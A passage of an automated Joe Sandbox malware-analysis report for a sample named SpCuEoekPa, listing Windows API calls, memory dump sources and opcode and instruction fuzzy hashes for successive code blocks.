                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AsyncState$ClientCursorScreen
                                                            • String ID:
                                                            • API String ID: 4210589936-0
                                                            • Opcode ID: 228b5621eaf85de4347ca92a2c2609ec985d0ba81412b12df33121f4b726866b
                                                            • Instruction ID: 09c722ec55f47f616409745a836232665f062037b4718b9751b9e6d963911129
                                                            • Opcode Fuzzy Hash: 228b5621eaf85de4347ca92a2c2609ec985d0ba81412b12df33121f4b726866b
                                                            • Instruction Fuzzy Hash: 19418039604619FFCF278F68C844AEEBB78BB05360F21835AF829962D0C7349950DB91
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003B63E7
                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 003B6433
                                                            • TranslateMessage.USER32(?), ref: 003B645C
                                                            • DispatchMessageW.USER32(?), ref: 003B6466
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003B6475
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                            • String ID:
                                                            • API String ID: 2108273632-0
                                                            • Opcode ID: 117d209abdab0fd68b2699b6a911bdfda7b8a4b7164d460b5db77c6ad3aa9045
                                                            • Instruction ID: 4a80da508d733d2516dc40980a4d414bb7be264d4c619dec004de08ebbd280fa
                                                            • Opcode Fuzzy Hash: 117d209abdab0fd68b2699b6a911bdfda7b8a4b7164d460b5db77c6ad3aa9045
                                                            • Instruction Fuzzy Hash: BE310631600A42DFDB328F71CC46BF67BACAB01308F550175E625C78A2E7789845CB60
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 003B8A30
                                                            • PostMessageW.USER32(?,00000201,00000001), ref: 003B8ADA
                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 003B8AE2
                                                            • PostMessageW.USER32(?,00000202,00000000), ref: 003B8AF0
                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 003B8AF8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleep$RectWindow
                                                            • String ID:
                                                            • API String ID: 3382505437-0
                                                            • Opcode ID: a7fed25b820ec47777a1b7bf8320122c03c787f43d239f6f509581d5872f8c40
                                                            • Instruction ID: 79d3397cd51049d19cce5fc0168d15d4a3a7e4bb9ec2705c2e31106621492d72
                                                            • Opcode Fuzzy Hash: a7fed25b820ec47777a1b7bf8320122c03c787f43d239f6f509581d5872f8c40
                                                            • Instruction Fuzzy Hash: 3A31D171500259EFDF15CF68D98CADE7BB9EB04319F108229FA24EA6D0C7B09910CB90
                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 003BB204
                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 003BB221
                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 003BB259
                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 003BB27F
                                                            • _wcsstr.LIBCMT ref: 003BB289
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                            • String ID:
                                                            • API String ID: 3902887630-0
                                                            • Opcode ID: c73b39fa279b24cb9b89b1a72c78d06d83b3dcf1b2b9e88c10fe9e803dcfe1ac
                                                            • Instruction ID: e12cdc944abdb379aad504944a4471e9d9a7d147eb34a897ac49c48ef3f89dba
                                                            • Opcode Fuzzy Hash: c73b39fa279b24cb9b89b1a72c78d06d83b3dcf1b2b9e88c10fe9e803dcfe1ac
                                                            • Instruction Fuzzy Hash: A821D331204240ABEB276B799C49ABFBB9CDF49710F014179F904DE5A1EFA1DC409360
                                                            APIs
                                                              • Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 003EB192
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 003EB1B7
                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 003EB1CF
                                                            • GetSystemMetrics.USER32(00000004), ref: 003EB1F8
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,003D0E90,00000000), ref: 003EB216
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$MetricsSystem
                                                            • String ID:
                                                            • API String ID: 2294984445-0
                                                            • Opcode ID: d16e6a01f3fcd3c6430345962bc00b33b40bea01008572fdea16d59e74b39c81
                                                            • Instruction ID: 0de6004efe1229762fcf3ccf6bc777da8a4ad59d530286f7944aaa03909c6221
                                                            • Opcode Fuzzy Hash: d16e6a01f3fcd3c6430345962bc00b33b40bea01008572fdea16d59e74b39c81
                                                            • Instruction Fuzzy Hash: A42171716106A5AFCB229F399C44A6B77A8EB06371F114B34A922D71E0D77098219B90
                                                            APIs
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003B9320
                                                              • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003B9352
                                                            • __itow.LIBCMT ref: 003B936A
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003B9392
                                                            • __itow.LIBCMT ref: 003B93A3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$__itow$_memmove
                                                            • String ID:
                                                            • API String ID: 2983881199-0
                                                            • Opcode ID: 508a329101f04af043cd65c4b3a39fb1b93c1abd2a9ef7c54d5b2495cdf826aa
                                                            • Instruction ID: 0bfe4002464c99d5af2dc685e2fd76dd910cb9766f8d0ae3ffa854e7c7dd51a1
                                                            • Opcode Fuzzy Hash: 508a329101f04af043cd65c4b3a39fb1b93c1abd2a9ef7c54d5b2495cdf826aa
                                                            • Instruction Fuzzy Hash: 4521B335700208BBDB12AA658CC5FEE7BADEF49718F044026FB499B2D1D6B089458791
                                                            APIs
                                                            • IsWindow.USER32(00000000), ref: 003D5A6E
                                                            • GetForegroundWindow.USER32 ref: 003D5A85
                                                            • GetDC.USER32(00000000), ref: 003D5AC1
                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 003D5ACD
                                                            • ReleaseDC.USER32(00000000,00000003), ref: 003D5B08
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$ForegroundPixelRelease
                                                            • String ID:
                                                            • API String ID: 4156661090-0
                                                            • Opcode ID: f5d8ff0d39d4ce73ed9f21486c0a100a1ab8d2de6e1ed826c6675051d5173e28
                                                            • Instruction ID: ce9cae060b9622a7de74bca99de91c47a6a254f83f01340b29167f3d30d3d33c
                                                            • Opcode Fuzzy Hash: f5d8ff0d39d4ce73ed9f21486c0a100a1ab8d2de6e1ed826c6675051d5173e28
                                                            • Instruction Fuzzy Hash: 1A216F76A00114AFDB15EF65D884A9ABBE9EF48350F14C57AF809DB362DA70AD00CB90
                                                            APIs
                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0036134D
                                                            • SelectObject.GDI32(?,00000000), ref: 0036135C
                                                            • BeginPath.GDI32(?), ref: 00361373
                                                            • SelectObject.GDI32(?,00000000), ref: 0036139C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ObjectSelect$BeginCreatePath
                                                            • String ID:
                                                            • API String ID: 3225163088-0
                                                            • Opcode ID: c3d26ad101a40c7a8ea82601e61f771f9aaf99c793ebc03f3690447b30005cd5
                                                            • Instruction ID: f721bf70ff9c17989c1679ea05acfdfedc3e377f3a84c045a573eafead12d079
                                                            • Opcode Fuzzy Hash: c3d26ad101a40c7a8ea82601e61f771f9aaf99c793ebc03f3690447b30005cd5
                                                            • Instruction Fuzzy Hash: E721B634900608DFDB22AF25DD447697BE8FB00321F688225F4119A6B4D3F099A2DF54
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memcmp
                                                            • String ID:
                                                            • API String ID: 2931989736-0
                                                            • Opcode ID: 7bc00aefba215b18ffd7c56f6e2e971afdc586f2832b4320a251fc9b179577cf
                                                            • Instruction ID: f4265c2f51fe418067a5b0e95bef8aece41ef840b1a6cd3e7f64584f5fb301e8
                                                            • Opcode Fuzzy Hash: 7bc00aefba215b18ffd7c56f6e2e971afdc586f2832b4320a251fc9b179577cf
                                                            • Instruction Fuzzy Hash: 68019271601209BBD206AB129D42FFBF76CDE1078CB044025FF059BB42EFD0DE1182A0
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 003C4ABA
                                                            • __beginthreadex.LIBCMT ref: 003C4AD8
                                                            • MessageBoxW.USER32(?,?,?,?), ref: 003C4AED
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 003C4B03
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003C4B0A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                            • String ID:
                                                            • API String ID: 3824534824-0
                                                            • Opcode ID: f3b936e7a28e1aac29512795dab40494194f392cdc78f300060437d29d86debe
                                                            • Instruction ID: d32aebb53d1d132502b42f87f484b4bea7deba3bb5249125dd87635b496dd778
                                                            • Opcode Fuzzy Hash: f3b936e7a28e1aac29512795dab40494194f392cdc78f300060437d29d86debe
                                                            • Instruction Fuzzy Hash: 0E11E576A04248BFC7229BA89C44F9A7BACEB45320F1442A9F814D7290D6B18D008BA0
                                                            APIs
                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 003B821E
                                                            • GetLastError.KERNEL32(?,003B7CE2,?,?,?), ref: 003B8228
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,003B7CE2,?,?,?), ref: 003B8237
                                                            • HeapAlloc.KERNEL32(00000000,?,003B7CE2,?,?,?), ref: 003B823E
                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 003B8255
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 842720411-0
                                                            • Opcode ID: 187100892d96c7fd731cfad6d0df89a7ee88fad2f25148ab67be5127d535c177
                                                            • Instruction ID: de87e76b83465c29f7d948a5b4b6d677381eda645e3065af68e4978951ef06f6
                                                            • Opcode Fuzzy Hash: 187100892d96c7fd731cfad6d0df89a7ee88fad2f25148ab67be5127d535c177
                                                            • Instruction Fuzzy Hash: B4018671201645FFDB224FA5DC88DA77F6CEF86754B504929F909CB1A0DB718C00CA60
                                                            APIs
                                                            • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?,?,003B7455), ref: 003B7127
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?), ref: 003B7142
                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?), ref: 003B7150
                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?), ref: 003B7160
                                                            • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?), ref: 003B716C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                            • String ID:
                                                            • API String ID: 3897988419-0
                                                            • Opcode ID: 2c9d260473cefd4c6a7990e541e08d0c09a963d38525c67516ab2b092a1f98fa
                                                            • Instruction ID: d89b245a5a0ff8ead020d4300d7bf7bdcb9955f123b87211f8ef3db83968e9a8
                                                            • Opcode Fuzzy Hash: 2c9d260473cefd4c6a7990e541e08d0c09a963d38525c67516ab2b092a1f98fa
                                                            • Instruction Fuzzy Hash: 19018FB6601204BFDB224F68DC84BEA7BADEF84795F154164FE08E6220D771ED409BA0
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003C5260
                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 003C526E
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 003C5276
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 003C5280
                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003C52BC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                            • String ID:
                                                            • API String ID: 2833360925-0
                                                            • Opcode ID: 436607fe8cffad72030be8a6fa7ed8b5ab3a692b1c66731868255ef2eb7fd463
                                                            • Instruction ID: ec49a125320b679ab694fe7908bc2ef7aa130e0b7da0358066b0695ac88af366
                                                            • Opcode Fuzzy Hash: 436607fe8cffad72030be8a6fa7ed8b5ab3a692b1c66731868255ef2eb7fd463
                                                            • Instruction Fuzzy Hash: C7016D31D01A1DDBCF11EFE4E888AEDBBBCFB09311F410969E941F6180CB70699087A1
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003B8121
                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003B812B
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003B813A
                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 003B8141
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003B8157
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: be0fad539cbf30bcfd862fd4df7c8577a2815987a8f5535827cdf186b532bf05
                                                            • Instruction ID: 3dec80d18446eb5596bce03d1da17ca7c668572c92a76689aec95df98b66ae62
                                                            • Opcode Fuzzy Hash: be0fad539cbf30bcfd862fd4df7c8577a2815987a8f5535827cdf186b532bf05
                                                            • Instruction Fuzzy Hash: B3F06875201344AFD7220F65DCC8EA73BACFF85758F010125F645D6190CBA1DD41DA60
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 003BC1F7
                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 003BC20E
                                                            • MessageBeep.USER32(00000000), ref: 003BC226
                                                            • KillTimer.USER32(?,0000040A), ref: 003BC242
                                                            • EndDialog.USER32(?,00000001), ref: 003BC25C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                            • String ID:
                                                            • API String ID: 3741023627-0
                                                            • Opcode ID: 961e5a5d150b83896d27833405c3601eece31f100f21126e3b9d7d721bf9d898
                                                            • Instruction ID: 8a7224d1ac4fbe4760b7b72a45dc866b459a1bf3626a9b33f00e9cd82b708c06
                                                            • Opcode Fuzzy Hash: 961e5a5d150b83896d27833405c3601eece31f100f21126e3b9d7d721bf9d898
                                                            • Instruction Fuzzy Hash: 0701A7304143089BEF325B50DD8EBD6777CBB0070AF000769A682998E0D7F069448B50
                                                            APIs
                                                            • EndPath.GDI32(?), ref: 003613BF
                                                            • StrokeAndFillPath.GDI32(?,?,0039B888,00000000,?), ref: 003613DB
                                                            • SelectObject.GDI32(?,00000000), ref: 003613EE
                                                            • DeleteObject.GDI32 ref: 00361401
                                                            • StrokePath.GDI32(?), ref: 0036141C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                            • String ID:
                                                            • API String ID: 2625713937-0
                                                            • Opcode ID: f72d2b7a0a768bdb3b35681808e52b4e24c61f1efd4a37f49558a4006f8fd324
                                                            • Instruction ID: 5061036940e350964a46e4356e9256b747742f54df32a268b7877602719cab31
                                                            • Opcode Fuzzy Hash: f72d2b7a0a768bdb3b35681808e52b4e24c61f1efd4a37f49558a4006f8fd324
                                                            • Instruction Fuzzy Hash: 89F0B630104A48EFDB336F26EC897683FA8AB01326F58C635E429495F5C7B149A6DF54
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 003CC432
                                                            • CoCreateInstance.OLE32(003F2D6C,00000000,00000001,003F2BDC,?), ref: 003CC44A
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                            • CoUninitialize.OLE32 ref: 003CC6B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                                            • String ID: .lnk
                                                            • API String ID: 2683427295-24824748
                                                            • Opcode ID: cc88e9b085818a6ccca30d502cc16709b139880c05962db566b2e9cee0808589
